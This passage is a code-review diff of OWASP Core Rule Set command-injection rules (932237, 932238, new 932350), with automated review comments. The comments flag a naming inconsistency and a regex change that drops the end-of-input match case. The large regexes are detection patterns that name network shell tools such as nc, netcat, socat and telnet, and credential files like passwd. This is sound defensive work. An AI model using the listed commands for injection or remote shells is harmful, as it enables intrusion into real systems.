n(?:c(?:(?:at)?[\s\x0b&\),<>\|]|\.(?:openbsd|traditional))|e(?:t(?:[\s\x0b&\),<>\|]|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:l|m(?:ap)?|p(?:m|ing)|a(?:no|sm|wk)|ice|o(?:de|hup)|roff)[\s\x0b&\),<>\|]|s(?:enter|lookup|tat[\s\x0b&\),<>\|]))|o(?:(?:d|ctave)[\s\x0b&\),<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg[\s\x0b&\),<>\|]))|p(?:a(?:(?:x|cman|rted|tch)[\s\x0b&\),<>\|]|s(?:swd|te[\s\x0b&\),<>\|]))|d(?:b(?:[\s\x
0b&\),<>\|]|2mb|3[\s\x0b&\),\.<>\|])|f(?:la)?tex|ksh[\s\x0b&\),<>\|])|(?:f(?:tp)?|g(?:rep)?|(?:w|op)d|xz|u(?:ppet|shd))[\s\x0b&\),<>\|]|hp(?:[57]?[\s\x0b&\),<>\|]|-cgi)|i(?:(?:co?|gz|ng6?)[\s\x0b&\),<>\|]|p(?:[\s\x0b&\),<>\|]|[^\s\x0b]{1,10}\b)|dstat)|k(?:g(?:[\s\x0b&\),<>\|]|_?info)|exec|ill[\s\x0b&\),<>\|])|r(?:y?[\s\x0b&\),<>\|]|int(?:env|f[\s\x0b&\),<>\|]))|s(?:(?:ed|ql)?[\s\x0b&\),<>\|]|ftp)|t(?:x[\s\x0b&\),<>\|]|ar(?:[\s\x0b&\),<>\|]|diff|grep))|er(?:(?:f|ms)[\s\x0b&\),<>\|]|l(?:5?[\s\x0b&\),<>\|]|sh))|y(?:3?versions|thon[23]))|r(?:(?:a(?:r|k[eu])|cp?|bash|nano|oute|vi(?:ew|m))[\s\x0b&\),<>\|]|e(?:(?:d(?:carpet)?|v|boot|name|p(?:eat|lace))[\s\x0b&\),<>\|]|a(?:delf|lpath)|stic)|m(?:(?:dir)?[\s\x0b&\),<>\|]|t(?:[\s\x0b&\),<>\|]|-(?:dump|tar))|user)|pm(?:(?:db)?[\s\x0b&\),<>\|]|(?:quer|verif)y)|l(?:ogin|wrap)|sync(?:-ssl|[\s\x0b&\),<>\|])|u(?:by[^\s\x0b]{1,10}\b|n(?:-(?:mailcap|parts)|c[\s\x0b&\),<>\|])))|s(?:(?:c(?:p|hed|r(?:een|ipt))|g|ash|diff|ftp|l(?:eep|sh)|plit)[\s\x0b&\),<>\|]|e(?:(?:d|ndmail|rvice)[\s\x0b&\),<>\|]|t(?:(?:facl)?[\s\x0b&\),<>\|]|arch|cap|env|sid))|h(?:(?:u(?:f|tdown))?[\s\x0b&\),<>\|]|\.distrib)|s(?:[\s\x0b&\),<>\|]|h(?:[\s\x0b&\),<>\|]|-(?:a(?:dd|gent)|copy-id|key(?:ge|sca)n)|pass))|u(?:[\s\x0b&\),<>\|]|do(?:-rs|[\s\x0b&\),<>_\|]|edit|replay))|vn(?:[\s\x0b&\),<>\|]|a(?:dmin|uthz)|bench|dumpfilter|fsfs|look|mucc|rdump|s(?:erve|ync)|version)|mbclient|o(?:(?:(?:ca|r)t|urce)[\s\x0b&\),<>\|]|elim)|qlite3|t(?:art-stop-daemon|dbuf|r(?:ace|ings[\s\x0b&\),<>\|]))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:(?:[cr]|ilf?)[\s\x0b&\),<>\|]|sk(?:[\s\x0b&\),<>\|]|set))|(?:bl|o(?:p|uch)|ftp|mux)[\s\x0b&\),<>\|]|e(?:[ex][\s\x0b&\),<>\|]|lnet)|i(?:c[\s\x0b&\),<>\|]|me(?:(?:out)?[\s\x0b&\),<>\|]|datectl))|c(?:l?sh[\s\x0b&\),<>\|]|p(?:dump|ing|traceroute))|r(?:a(?:ceroute6?|p[\s\x0b&\),<>\|])|off[\s\x0b&\),<>\|])|shark)|u(?:l(?:imit)?[\s\x0b&\),<>\|]|n(?:(?:ame|compress|iq|rar|s(?:et|hare)|xz)[\s\x0b&\),<>\|]|expand|l(?:ink[\s\x0b&\),<>\|]|z(?:4[\s\x0b&\),<>\|]|m
a))|pigz|z(?:ip[\s\x0b&\),<>\|]|std))|p(?:2date[\s\x0b&\),<>\|]|date-alternatives)|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:(?:[ep]w|gr|rsh)?[\s\x0b&\),<>\|]|m(?:[\s\x0b&\),<>\|]|diff)|sudo(?:-rs)?)|algrind|olatility[\s\x0b&\),<>\|])|w(?:(?:c|a(?:ll|tch))?[\s\x0b&\),<>\|]|h(?:o(?:(?:is)?[\s\x0b&\),<>\|]|ami)?|iptail[\s\x0b&\),<>\|])|i(?:reshark|sh[\s\x0b&\),<>\|]))|x(?:(?:(?:x|pa)d|args|term)[\s\x0b&\),<>\|]|z(?:(?:c(?:at|mp))?[\s\x0b&\),<>\|]|d(?:ec[\s\x0b&\),<>\|]|iff)|[ef]?grep|less|more)|e(?:latex|tex[\s\x0b&\),<>\|])|mo(?:dmap|re[\s\x0b&\),<>\|]))|z(?:ip(?:[\s\x0b&\),<>\|]|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h[\s\x0b&\),<>\|]|oelim|td(?:[\s\x0b&\),<>\|]|(?:ca|m)t|grep|less))|athura|(?:c(?:at|mp)|diff|grep|less|run)[\s\x0b&\),<>\|]|[ef]grep|mo(?:dload|re[\s\x0b&\),<>\|])|ypper))(?:\b|[^0-9A-Z_a-z])" \ "id:932237,\ phase:1,\ block,\ @@ -1821,7 +1903,7 @@ SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?i)\b(?:7z(?:[\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -1837,6 +1919,8 @@ SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?i)\b(?:7z(?:[\ # # .932250 (base rule, PL1, targets two and three character commands) # .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# .932340 (PL-1, matches commands with no arguments) +# .932350 (PL-3, matches commands with no arguments) # # .932240 (generic detection, PL2, targets generic evasion attempts) # .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, 
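Review bot: The two relation lines added in the `@@ -1837,6 +1919,8 @@` hunk write the paranoia level as `PL-1` and `PL-3`, while every neighbouring entry in the same list (`.932230 (base rule, PL1, …)`, `..932231 (stricter sibling, PL2, …)`, `.932240 (generic detection, PL2, …)`) uses the `PLn` form. Because this rule-relations block is copied verbatim into each rule header, the inconsistency already recurs in the new 932350 header further down; suggest `# .932340 (PL1, matches commands with no arguments)` and `# .932350 (PL3, matches commands with no arguments)` in both places.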
@@ -1862,7 +1946,7 @@ SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?i)\b(?:7z(?:[\ # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 932238 # -SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/*|REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\
$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[\s\x0b&\),<>\|]|$).*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?2[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!
#\(\*\-0-9\?@_a-\{]*)?\x5c?d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n|s)|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?f|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o|(?:[\s\x0b&\),<>\|]|$).*))" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/*|REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx 
(?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\
||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|].*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?2[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)
[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n|s)|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?f|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o|[\s\x0b&\),<>\|].*))" \ "id:932238,\ phase:2,\ block,\ @@ -1878,7 +1962,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/*|REQUEST_HEA tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" 
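Review bot: The regenerated 932238 regex drops the `|$` alternative after the command words (old `(?:[\s\x0b&\),<>\|]|$).*`, new `[\s\x0b&\),<>\|].*`, in several places), so a command word that ends the inspected variable with no trailing separator is no longer matched by this rule; the 932237 hunk above shows the same removal. Nothing in the 932238 header (which begins outside this hunk) records that this case now depends on another rule, so someone tuning or excluding rules cannot see the coupling; if the replacement is the new 932350 (PL3) added below, that is worth stating explicitly. Suggest adding above the `crs-toolchain regex update 932238` line: `# Commands without arguments (end of variable directly after the command word) are handled by 932350.`, with a mirror-image line in the 932350 header.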
@@ -1914,11 +1998,71 @@ SecRule ARGS "@rx /(?:[?*]+[a-z/]+|[a-z/]+[?*]+)" \
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-RCE',\
 tag:'capec/1000/152/248/88',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
+# [ Unix command injection ]
+#
+# This rule is meant to block the execution of commands with no arguments when it's possible to meaningfully do so.
+#
+# Rule relations:
+#
+# .932230 (base rule, PL1, targets prefix + two and three character commands)
+# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command)
+# ..932232 (stricter sibling, PL3, targets prefix + additional command words)
+# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion)
+#
+# .932250 (base rule, PL1, targets two and three character commands)
+# .932260 (base rule, PL1, targets known command word of length > 3 without evasion)
+# .932340 (PL-1, matches commands with no arguments)
+# .932350 (PL-3, matches commands with no arguments)
+#
+# .932240 (generic detection, PL2, targets generic evasion attempts)
+# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2,
+# - with and without prefix
+# - words of any length)
+# ..932239 (sibling of 932236, PL2,
+# - with and without prefix
+# - words of any length
+# - targets request headers user-agent and referer only
+# - excluded words: known user-agents)
+# ..932238 (stricter sibling of 932236, PL3,
+# - no excluded words)
+# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3,
+# - targets request headers user-agent and referer only
+# - without prefix
+# - with word boundaries
+# - words of any length
+# - excluded words: known user-agents)
+#
+#
+# Regular expression generated from regex-assembly/932350.ra.
